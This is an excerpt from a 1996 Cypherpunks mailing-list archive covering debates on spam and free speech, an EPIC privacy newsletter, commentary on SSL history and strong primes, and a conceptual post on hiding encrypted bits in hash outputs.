Subject: Re: mailing lists
In-Reply-To: <3238648F.207@precipice.v-site.net>
Message-ID: <Pine.BSF.3.91.960912175054.4035C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Sep 1996, HipCrime wrote:

> >i don't see you sticking your neck out to deal with assholes who think
> >freedom of speech is secondary to their right not to ever see mail
> >they don't want. 
> 
> Like hell we're not.  What are you guys mad at us for?  Thinking that
> FREEDOM of SPEECH is much, much more important that whining computer
> nerds who can't push a DELETE button.
> 

Freedom of speech is a poor excuse for junk email. There are few absolute
freedoms in any society, and those that exercise their "freedom" to the
point of abusing their fellows are those who cause such freedoms to become
more restricted. I'm personally against needing to pay the social costs of
more and more laws because someone is trying to make a buck any way he
can, regardless of the costs and annoyances to others.

Hitting the DELETE key once in a while is not the problem. Inequitable 
division of the costs is a problem. The aggravation of seeing something 
good being slowly eroded is a problem. People who feel that they have 
"rights" and "freedoms" with no concept of the social responsibility that 
creates and protects such intangibles are a problem.

> Well, "doctor" why can't you see (with your logic) that junk Email (or
> "spam") would save many, many forests if it REPLACED junk SnailMail.
> 

And how much could be saved if we did away with both? Could we end world 
hunger if spammers were converted to soylent green?


> Isn't it just that your "irrelevant feelings" have been hurt, because
> someone used your remailer-baby in a way you hadn't planned for ?!?
> 
> Why not put your money where your mouth is, and bet me (any amount),
> that spam WILL be socially acceptable by the year 2000.  Particularly,
> when the green-folks discover how many trees will be saved.  It'll be
> a social-mandate, NOT just a suggestion.  Want to bet?
> 

Telemarketing (even at at dinner time) is widespread. So is junk snail-mail. 
How socialy acceptable these behaviors are is debatable.

Junk faxing was a blessedly short term fad, one that had to be legislated 
away.

I'm completely in favor of allowing junk email, as long as "JUNK MAIL" is 
required to be the first thing on the subject line. PLONK!   ... but that 
will take yet another law ... 

- r.w.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 13 Sep 1996 09:41:47 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: EPIC Alert 3.16
Message-ID: <n1369570236.46432@epic.org>
MIME-Version: 1.0
Content-Type: text/plain



    =============================================================

       @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
       @     @  @   @   @        @ @   @     @     @  @    @
       @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
       @     @      @   @       @   @  @     @     @  @    @
       @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

   ==============================================================
   Volume 3.16                                 September 12, 1996
   --------------------------------------------------------------

                            Published by the
              Electronic Privacy Information Center (EPIC)
                            Washington, D.C.

                          http://www.epic.org/

=======================================================================
Table of Contents
=======================================================================

[1] White House Proposes Screening of all Airline Passengers
[2] EPIC Testifies on Children's Privacy Bill
[3] House Panel Probes White House Database
[4] Crypto Update
[5] Anonymous Remailer Shuts Down
[6] EPIC Now Accepts First Virtual Contributions
[7] EPIC/PI to Sponsor Conference on Surveillance Technologies
[8] Upcoming Conferences and Events

=======================================================================
[1] White House Panel Endorses Airport "Profiling" System
=======================================================================

In the wake of perceived terrorist threats and the mysterious crash of
TWA Flight 800 in July, a Presidential advisory panel has proposed an
automated system for increased screening and "profiling" of airline
passengers for all domestic and international flights.  In its interim
report sent to President Clinton on September 9, the White House
Commission on Aviation Safety and Security provided few specifics, but
noted that "[b]ased on information that is already in computer
databases, passengers could be separated into a very large majority
who present little or no risk, and a small minority who merit
additional attention."

Details of the profiling system will presumably be withheld from the
public on national security grounds -- a substantial portion of the
Commission's "public" meeting on September 5 was closed to permit the
discussion of "classified" matters.  Nonetheless, the proposed system
appears to raise substantial privacy issues.  The Washington Post
recently reported that under the proposal, "the federal government
would require creation of a computer profiling system that would
examine passengers' bill-paying records, flying habits and much other
data to determine which checked baggage should undergo examination by
sophisticated explosives detection equipment."  The Commission's
initial report also calls for FBI and CIA involvement in the
development of the profiling database.

The theory underlying the profiling proposal appears to be that even
seemingly innocuous bits of personal data can raise the suspicions of
a law enforcement agency.  This point is illustrated by the comments
of an unidentified FBI agent recently quoted in a New York Times
article. Discussing the Bureau's investigation of the bombing of Pan
Am Flight 103 over Scotland, the agent noted that, "Almost everyone on
the plane, almost everyone you ever met, has something that can get
your imagination going.  A recent fight, a divorce, a business deal,
an overseas connection -- when you don't know what you're looking for,
it's easy to see all kinds of possibilities."

EPIC plans to monitor the development of the automated passenger
profiling system under the public oversight provisions of the Federal
Advisory Committee Act, which governs the proceedings of the White
House Commission.

More information, including relevant government documents, is
available at:

     http://www.epic.org/privacy/faa/

=======================================================================
[2] EPIC Testifies on Children's' Privacy Bill
=======================================================================

EPIC Director Marc Rotenberg testified today before the House
Judiciary Committee Subcommittee on Crime in support of the Childrens
Privacy Protection and Parental Empowerment Act of 1996.  The bill
would establish basic privacy standards for organizations that collect
personal information on children and curb recent abuses in the
marketing industry.  The bill is sponsored by Rep. Bob Franks (R-NJ)
and has 46 cosponsors in the House of Representatives.  A similar
measure has been introduced in the Senate by Senator Diane Feinstein
(D-CA).

Rotenberg said that "current practices pose a substantial threat to
the privacy and safety of young people."  He described a recent
incident where a reporter posing as the murderer of Polly Klaas was
able to obtain the ages and address of young children living in the
Pasadena area.  Rotenberg also cited editorials from USA Today and the
Economist favoring privacy legislation as well as public opinion polls
which show that 9 out of 10 Americans object to the sale of personal
data where explicit consent is not obtained.

Recalling the passage of the Family Educational Right to Privacy Act
of 1974, which protects the privacy of student records, Rotenberg said
there was already Congressional recognition of the need to protect
personal information about young children. "No universities have been
shut down because of the Act, but the privacy of children's
educational records is more secure because Congress did not fail to
act when it had the opportunity to establish privacy protection for
young people." #011#Also testifying in support of the bill were Rep. Bob
Franks, children rights advocate Marc Klaas, and Miriam Bell of Enough
is Enough. Marc Klaas also heads the Klaas Foundation for Children
which launched the Kids Off Lists campaign.

Testifying against the bill were representatives from the Direct
Marketing Association, a list broker, a book publisher, and a police
officer from San Bernadino.

More information on the Childrens Privacy bill and kids privacy may be
found at:

   http://www.epic.org/privacy/kids/

The Klaas Foundation for Children is on the web at:

   http://www.klaaskids.inter.net/


=======================================================================
[3] House Panel Probes White House Database
=======================================================================

The General Accounting Office revealed at a hearing of a subcommittee
of the House Committee on Government Reform and Oversight on September
11 that the secret White House database of 200,000 people has
inadequate controls on access. The GAO reported that the database,
this existence of which, was revealed during the Filegate controversy,
does not keep track of what files have been viewed by the 150 White
House staffers who are authorized to access the files.

The database contains 125 different fields of information for each
file. Several thousand files included ethnic and political
information. The GAO did not reveal in its testimony what was
contained in the other fields. According to news reports, the database
was designed to link into other related databases, including the
Secret Service and the Democratic National Committee.

The White House claims that the database is used for a number of
reasons, including, for invite lists for White House events, tracking
correspondence, sending out Christmas cards and other matters.
Congressional Republicans claim that it is more akin to the Nixon
"enemies list."

The database was created by PRC Inc., a company that also creates
databases for the CIA and other intelligence agencies, among other
government agencies.

=======================================================================
[4] Crypto Update
=======================================================================

As the election approaches and Congress scrambles to complete its
agenda before recessing for the year, members are continuing to deal
with cryptography-related issues.

The Senate Commerce Committee delayed its scheduled vote on S. 1735,
the Promotion of Commerce Online in the Digital Era, originally
planned for September 12. The Committee is expected to take up the
measure next week. Members of the Committee have reported receiving a
large number of calls supporting the bill. Individuals interested in
supporting the bill should continue calling members of the Committee.

The House is planning to hold hearings at the end of September to
examine the companion House bill. The hearings were originally
scheduled for September 11 but were delayed due to other legislative
matters.

The White House is also expected to introduce its own legislation next
week. According to reporter Brock Meeks, the legislation will offer
"sweetheart deals" to limited segments of the industry including
financial, health care and insurance sectors who would then agree to
support government key escrow systems. The systems would then become
de facto mandatory.

Internationally, an expert committee of the Organization for Economic
Cooperation and Development is meeting on September 26-27 to review
draft guidelines on cryptography policy. The US has been pressuring
the OECD to adopt its key escrow proposals as an international
standard but has been opposed by other countries and business
representatives.

EPIC will be hosting an international symposium in Paris on September
25, in cooperation with the OECD, to provide an opportunity for
cryptographers, human rights advocates, privacy experts and user
associations to present public concerns about the development of
international privacy guidelines. The event will feature speakers from
more than a dozen countries and includes US cryptographers Matt Blaze,
Whit Diffie, and Phil Zimmermann.

On September 20, oral arguments will be heard in the Daniel
Bernstein's challenge to the constitutionality of export controls in
federal court in San Francisco. Bernstein is arguing that the controls
violate the First Amendment. Judge Marilyn Patel ruled preliminarily
in May that software code is speech protected by the First Amendment

More information on cryptography is available from:

    http://www.epic.org/crypto/


=======================================================================
[5] Anonymous Remailer Shuts Down
=======================================================================

Johann Helsingius, the operator of the anon.penet.fi anonymous e-mail
service has decided to shut down his remailer service because of the
unknown legal protections of privacy on the Internet. He had come
received requests by the Church of Scientology and the Singapore
government demanding to know the identity of some of his users.

In a press release, he said that he hoped to bring the server back up
once the Finnish government enacted new laws protecting privacy of
electronic messages, "I will close down the remailer for the time
being because the legal issues governing the Internet in Finland are
yet undefined. The legal protection of the users needs to be
clarified. At the moment the privacy of Internet messages is
judicially unclear."

A list of remailers and other tools to protect privacy are available
from:

    http://www.epic.org/privacy/tools.html

=======================================================================
[6] EPIC Now Accepts First Virtual Contributions
=======================================================================

Individuals interested in donating or purchasing books from EPIC can
now use the First Virtual system to transfer money to EPIC. Until the
end of 1996, donations of up to $50 will be matched by the Stern
Foundation.  Your support is appreciated and will help make possible
our continued FOIA litigation, privacy advocacy, and web site
development.

More information about supporting EPIC is available at:

   http://www.epic.org/epic/donate.html


=======================================================================
[7] EPIC/PI to Hold Conference on Surveillance 
=======================================================================

The new generation of covert surveillance activities of government
agencies and private companies will be examined at a conference to be
held in Ottawa next week, sponsored by EPIC and Privacy International.

The conference will explore the process of planning and implementation
of the technologies, their operating conditions, and the people and
organizations responsible for instituting them.  The conference will
also examine possible technical, regulatory and legal responses.

A number of former government agents, intelligence experts and
surveillance analysts will gather at the Advanced Surveillance
Technologies II conference on September 16th to discuss the use of
powerful new technologies being used to gather information.

Speakers will include Mike Frost, a former intelligence officer for
the Canadian Communications Security Establishment and author of the
bestseller "Spyworld."  He will discuss the surveillance technologies
used by the CSE and its American counterpart, the National Security
Agency.

The Conference will take place at the Citadel Hotel in Ottawa, Canada.
More information is available on the conference from the Privacy
International Web Page at:

     http://www.privacy.org/pi/conference/ottawa/

=======================================================================
[8] Upcoming Conferences and Events
=======================================================================

"Advanced Surveillance Technologies II."  September 16, 1996.  Ottawa,
Canada.  Sponsored by EPIC and Privacy International. Contact:
http://www.privacy.org/pi/conference/ottawa/ or email pi@privacy.org.

"Privacy Beyond Borders", 18th International Privacy and Data
Protection Conference. September 18-20, 1996.  Ottawa, Canada.
Sponsored by the Privacy Commissioner of Canada. Contact:
jroy@fox.nstn.ca or http://infoweb.magi.com/~privcan/

"Regulation or Private Ordering? The Future of the Internet."
September 20, 1996. Washington, DC. Sponsored by the CATO Institute.
Contact: R. Scott Wallis, (202) 789-5296.

"The Public Voice and the Development of International Cryptography
Policy." September 25, 1996. Paris, France. Sponsored by EPIC.
Contact: rotenberg@epic.org.

"The 2nd International Conference & Exhibit on Doing Business Securely
on the Information Highway." September 30 - October 1, 1996. Montreal,
Quebec, Canada. Contact:
http://www.ecworld.org/Conferences/2nd_Security/ menu.html.

"Managing Privacy in Cyberspace and Across National Borders." October
8-10, 1996. Washington, DC. Sponsored by Privacy and American
Business. Contact: Lorrie Sherwood, (201) 996-1154.

"The Information Society: New Risks & Opportunities in Privacy,"
October 17-18, 1996.  Bruxelles, Belgium. Sponsored by the European
Parliament. Contact: http://www.droit.fundp.ac.be/privacy96.html

"Communications Unleashed - What's at Stake? Who Benefits? How to Get
Involved!" October 19-20, 1996. Washington DC. Sponsored by CPSR and
Georgetown University. Contact: phyland@aol.com.

"19th National Information Systems Security Conference." October
22-25, 1996. Baltimore, MD. Sponsored by NSA & NIST. Contact: Tammy
Grice (301) 948-2067.

"Eurosec'97, the Seventh Annual Forum on Information Systems Quality
and Security." March 17-19. 1997. Paris, France. Sponsored by XP
Conseil.  Contact: http://ourworld.compuserve.com/homepages/eurosec/

             (Send calendar submissions to alert@epic.org)

=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
Privacy Information Center. To subscribe, send email to
epic-news@epic.org with the subject: "subscribe" (no quotes).

Back issues are available via http://www.epic.org/alert/

=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC. It was established in 1994 to focus
public attention on emerging privacy issues such as the Clipper Chip,
the Digital Telephony proposal, national id cards, medical record
privacy, and the collection and sale of personal information. EPIC is
sponsored by the Fund for Constitutional Government, a non-profit
organization established in 1974 to protect civil liberties and
constitutional rights. EPIC publishes the EPIC Alert, pursues Freedom
of Information Act litigation, and conducts policy research. For more
information, email info@epic.org, HTTP://www.epic.org or write EPIC,
666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. +1 202 544
9240 (tel), +1 202 547 5482 (fax).

If you'd like to support the work of the Electronic Privacy
Information Center, contributions are welcome and fully
tax-deductible. Checks should be made out to "The Fund for
Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act and
First Amendment litigation, strong and effective advocacy for the
right of privacy and efforts to oppose government regulation of
encryption and funding of the National Wiretap Plan.

Thank you for your support.

  ----------------------  END EPIC Alert 3.16 -----------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Sep 1996 12:13:14 +0800
To: cypherpunks@toad.com
Subject: "Unwanted Mail"
Message-ID: <ae5e0391020210044711@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:48 PM 9/12/96, Rabid Wombat wrote:
>>
>> These people have invited the email, and the associated expense, by placing
>> a public email-to: button on their public www page.
>
>
>Most people put up an "email to:" button on a public page for
>communications related to what's on the page. It's quite a stretch to
>assume that this invites any and all email from anyone who cares to send
>whatever they want. I can't say I've ever seen one that said "Please send
>SPAM(tm) to:" ...

But to attempt to define "SPAM" (unless you're Armour) is dangerous. This
whole notion of "unwanted mail" is ill-defined and not something "the law"
should get involved in, in my view. (And CP technologies certainly are
consistent with this, e.g., placing the role of screening on those who set
up gates, not on tracking down True Names for prosecution.)

>However, since others may think like you, I guess I'll have to add a line
>above my link stating that email not related to the purpose of my site
>will be happily proof-read at the rate of $200 per hour, 1 hour per 60
>lines, minimum. Perhaps I'll get lucky. If I get a big enough chunk of
>SPAM(tm), it might be worth the costs of breaking down the anonymity.

As the legal eagles will tell you, the essence of a contract is a two-way
agreed upon set of terms, not a one-way "if you send me mail I decide I
don't want, you will have incurred a charge of $1000." Try enforcing your
$200 an hour "proofreading charge" in any court in the land.

(I've been saying this thing for several years. Who knows, maybe Rabit
Wombat was the first to use it. Whatever, it's as unenforceable and
meaningless now as it was several years ago.)

>No, this b.s. is more like having someone put a dead skunk in my mailbox,
>with no return address, trying to prevent me from sending them 100 dead
>skunks as a return favor. And about as welcome.

In the case of actual USPS mailboxes, there are laws which prevent others
from using them (e.g., no UPS or FedEx deliveries). For sure, dead skunks
can be placed in mailboxes, or under porches, or whatever. The law can't
fix everything.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sun, 15 Sep 1996 09:34:58 +0800
To: cypherpunks@toad.com
Subject: Re: forward secrecy in mixmaster
Message-ID: <842701000.12934.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> This has been discussed extensively for Internet security reasons, and the
> Photuris folks decided to use a common modulus (actually, several with different
> lengths.)  I think they chose a strong prime (form p = 2q+1, q prime),
> specifically to avoid small-prime attacks, though they may have decided
> that that was no longer necessary.

I assume from the last sentence that you know that the use of strong 
primes is no longer advantageous but I will just reiterate it here 
for the good of those writing code which implements strong primes:

Strong primes are no longer of any benefit for cryptographic 
applications.

The elliptic curve method of factoring takes no longer to factor a 
"strong" prime than it does for any other general number.
You may *SLIGHTLY* hinder progress if an attacker sieves first, but 
as you should have done so when you created the primes in the first 
place it won`t be a problem because there wont be any small factors.

Implementing strong primes won`t make your code any less secure, it 
will just take longer to create the keys and won`t gain you any 
security, all te big boys are using elliptic curve factoring methods 
now so you really have nothing to gain.


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Sep 1996 12:18:02 +0800
To: cypherpunks@toad.com
Subject: Morph Escrow
Message-ID: <ae5e0850030210046485@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 9/13/96, Greg Broiles wrote:

>Kozinski also suggested that computer-generated or morphed images of
>children involved in sexual acts may not be protected under the Constitution
>because of ongoing trauma to the child, while computer-generated or morphed
>images of adults would be protected.

Hence the proposal for "morph escrow":

"Upon presentation of a valid court order or Presidential Decision
Directive, a complete morph history of any image deemed possibly of
prurient interest must be presented to law enforcement."

As the law cannot tell if an image of prurient interest started out as a
legal image of Raquel Welch or Jennifer Aniston, or started out as an
illegal image of a minor child, morph escrow will force all image
possessors and distributors to produce proof that the image started out
legal. Failure to escrow morph histories, or possession of an image with an
authorized morph history escrow certificate, is punishable by not less than
six months in jail.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Fri, 13 Sep 1996 12:19:13 +0800
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: [Long] A history of Netscape/MSIE problems
In-Reply-To: <199609120716.IAA00231@server.test.net>
Message-ID: <199609130137.SAA27304@lachesis.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Hadn't heard that before, that the trade secret requirement was
> imposed on RSADSI.  What was your source for that info, it is an
> interesting assertion on the part of RSADSI, and I am intrigued.

	An RSA employee told me this once, unofficially.  (Not that
this makes it true, mind you)

-- 
Sameer Parekh					Voice:   510-986-8770
C2Net						FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Sep 1996 12:21:38 +0800
To: cypherpunks@toad.com
Subject: Reputation Systems in Action
Message-ID: <ae5e09fb04021004c8e5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:41 PM 9/11/96, paul@fatmans.demon.co.uk wrote:
>> tcmay@got.net (Timothy C. May) writes:
>> > As to "tasteless and insulting," a matter of personal perspective. I find
>> > it helpful to call a spade a spade, and others apparently do as well.
>> >
>>
>> Of course, Tim gets very uncomfortable when others call a spade a spade.
>
>
>This constant character assasination of Tim is getting rather boring,
>as far as I can see, and I read all of the posts on the list, he has
>done nothing more than ignore posts from these idiots, that is his
>choice and nothing to do with anyone else.

But this latest episode illustrates the role of reputations. Namely, my own
reputation is not being harmed by bizarre commentaries from the Vulis-bot.
As its reputation is (apparently) pretty low, and associated with Serdar
Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity
can hardly "assassinate" my character.

A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx,"
aka "Pablo Escobar," aka several other alternate personalities, wrote
dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc.
Did this have an effect on our reputations? Not to people I respected, of
course. And if Detweiler's rants affected my reputation with his peers,
including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic,
well, this is to the good.

In the mathematics of reputations, a negative reputation held by one whose
own reputation is negative is a positive.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.v-site.net>
Date: Fri, 13 Sep 1996 12:16:56 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <Pine.BSF.3.91.960912185335.4035G-100000@mcfeely.bsfs.org>
Message-ID: <3238BD18.64F8@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain


> I'd view "comment" as expressing an opinion. If I put an "email to:" 
> tag on a web site, I'm inviting "comment" on the information I've 
> placed in public view 

A message sent to a MAILTO button on a WebPage, which contains the URL 
of another WebPage is EXACTLY on-topic.  It's my belief that any active 
"webmistress" would be interested in what other sites have to offer.

-- HTTP://www.HIPCRIME.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Fri, 13 Sep 1996 09:07:44 +0800
To: cypherpunks@toad.com
Subject: Re: [Long] A history of Netscape/MSIE problems
In-Reply-To: <517brn$lu7@life.ai.mit.edu>
Message-ID: <3238962F.1372@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Some comments:-

1) Netscape were using BSafe but Kipp unhooked the ergodicity testing
code which is meant to detect inadequate random number generation
methods.

Netscape got full access to Bsafe in return for 1% of Netscape stock.


2) Most serious concern was not the 40bit part. That was simply the US
govt making the security a joke and there was nothing that Kipp or
anyone else could do about it.

More serious were the structural problems, SSL cannot be used across a
firewall (unless the admin is a twit) because it is entirely opaque. SSL
is not very good as an authentication only option.

There is no facility for escrow of keys - another essential feature if
you are to use it inside a corporation. If I am the CIO of IBM I'm not
having the company secrets go out the door via some encrypted stream I
can't read. Similarly banks and nuclear power stations have a legit need
to snoop on their own lans.


3) Microsoft proposed PCT because they wanted to force Netscape to make
SSL an open standard rather than one Netscape could tweak as they liked
and freeze Microsoft out of the picture. Quite how they would imagine
that anyone would want to ever do such a thing...


4) The initial weakness exposed in SSL was that integrity attacks had
not been considered at all. It took a while to explain that this was in
fact a more pressing concern than confidentiality in many applications.
The SSL.v2 integrity was not actually bound to a particular site. Simon
Spero produced a rather nice proxy server which allowed one to reroute
URLs but keep the key intact. (ie connect to foobar.com and get the
netscape home page).

There was a long list of security holes in SSL, PCT plugged a good
number of them and SSL v3 plugged a few. The overall design never gave
me confidence however. Like much Netscape stuff they start with an
over-simple view of the problem spec and then try to solve problems by
adding extra ornaments.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Fri, 13 Sep 1996 09:37:16 +0800
To: cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <5181bh$614@life.ai.mit.edu>
Message-ID: <3238987B.500F@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


watson@tds.com wrote:
> 
> NetSurfer said:  If you know a valid email address on the spammers system you can always
> bounce each message back to them.  If enough people turned the messages
> back on them it might give them the opportunity to experience first hand
> what its like to receive tons of mail you don't want or need...
> 
> Doesn't seem to work that well.  The "green card lawyers" were reported
> to have received hate-mail in the hundreds of thousands.  The happily waded
> through it all and pulled out a few valid replies who apparently made it
> all a net profit for them, apparently.  What we really need is to improve
> our defensive filtering mechanisms.  Someday soon we'll all have our own
> personal software agents that will handle all this stuff for us.

Balls, the green card lawyers minions ratted on them. The number of
responses
from interested people was small and the amount of business they
obtained 
even smaller. The cost of going through all the mail, getting new net
hosts
and such left them with a net loss which is why they are no longer in 
business.



	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Sep 1996 14:21:45 +0800
To: cypherpunks@toad.com
Subject: Re: Fed appellate judge remarks re anonymity
Message-ID: <ae5e145d05021004394a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:47 AM 9/13/96, Jim Choate wrote:
>Forwarded message:
>
>> Date: Thu, 12 Sep 1996 17:40:19 -0700
>> From: Greg Broiles <gbroiles@netbox.com>
>> Subject: Fed appellate judge remarks re anonymity, free speech on the
>>   net
>>
>> The article quotes Kozinski as saying "I have a severe problem with
>> anonymous E-mailers . . . You don't have a right to walk up to somebody's
>> door and knock with a bag over your head." The article says Kozinski likened
>> anonymous E-mail to menacing someone.
>
>I guess the esteemed judge doesn't believe in Halloween....

Actually, seven of the children who came before his court on this charge
are still in prison. He sentenced them to between 4 and 7 years.

(By the way, some communities have made it illegal for adults to be out by
themselves when children are "trick-or-treating." Typically, the laws are
vague and are used for harassment, not actual prosecution. And I rather
doubt that the costume I plan to wear to Sandy Sandfort's party--"Jeffrey
Dahmer," with a bag over my shoulder and what appear to be severed limbs
sticking out of the bag--would be "acceptable" to local cops.)

--Tim "The Unadahmer" May (I blow up my victims and then cook the pieces)



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@suite.suite.com (Jim Miller)
Date: Fri, 13 Sep 1996 16:51:08 +0800
To: cypherpunks@toad.com
Subject: really undetectable crypto
Message-ID: <9609130234.AA06200@suite.com>
MIME-Version: 1.0
Content-Type: text/plain



Most everybody on the list is familiar with the technique of hiding  
encrypted messages in the LSBs of image files.  Personally, I would not  
use such a technique because don't I believe it's really undetectable.  I  
assume, without proof, that the LSBs of images files have statistical  
properties that are sufficiently different from encrypted data that a  
clever person could determine whether or not an image file contained an  
imbedded encrypted message.

Fortunately, there are other steganographic techniques that, I believe,  
are undetectable.  The trick is to hide your encrypted bits in other  
encrypted bits.

trick #1)   Let's say you want to send a short encrypted message via a  
communications channel that only allows cleartext messages with optional  
MD5 message hashes.  You can construct cleartext messages, via  
trial-and-error, such that the first 4 or 8 bits (or more, if you have the  
time) of the MD5 hash match the first 4 or 8 bits of your encrypted  
message.  You can pre-compute all the required cleartext messages in  
advance, and then send them one after another.  The recipient of the  
cleartext messages can reconstruct the encrypted message by gathering  
together the first 4 or 8 bits of each MD5 hash.

Since the bits in an MD5 message hash are presumably cryptographically  
random, there should be no way to tell if some of the bits combine to make  
an encrypted message.

trick #2)  Let's say you are allowed to use 40 bit encryption, but nothing  
stronger.  As in trick #1, you can pre-compute plaintext messages such  
that the first 4 or 8 of the bits in the output of the government-approved  
40 bit encrypted data match the first 4 or 8 bits of your hidden encrypted  
message.

trick #n) see above.  Any communications channel that allows you to send  
*any* bits that are cyptographically random can be used to send arbitrary  
encrypted messages.

Jim_Miller@suite.com


P.S. The pre-computed plaintext messages don't have to be garbage  
messages.  You can probably make an innocent-looking message produce the  
desired bits by adding extra whitespace or typos.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 13 Sep 1996 16:54:49 +0800
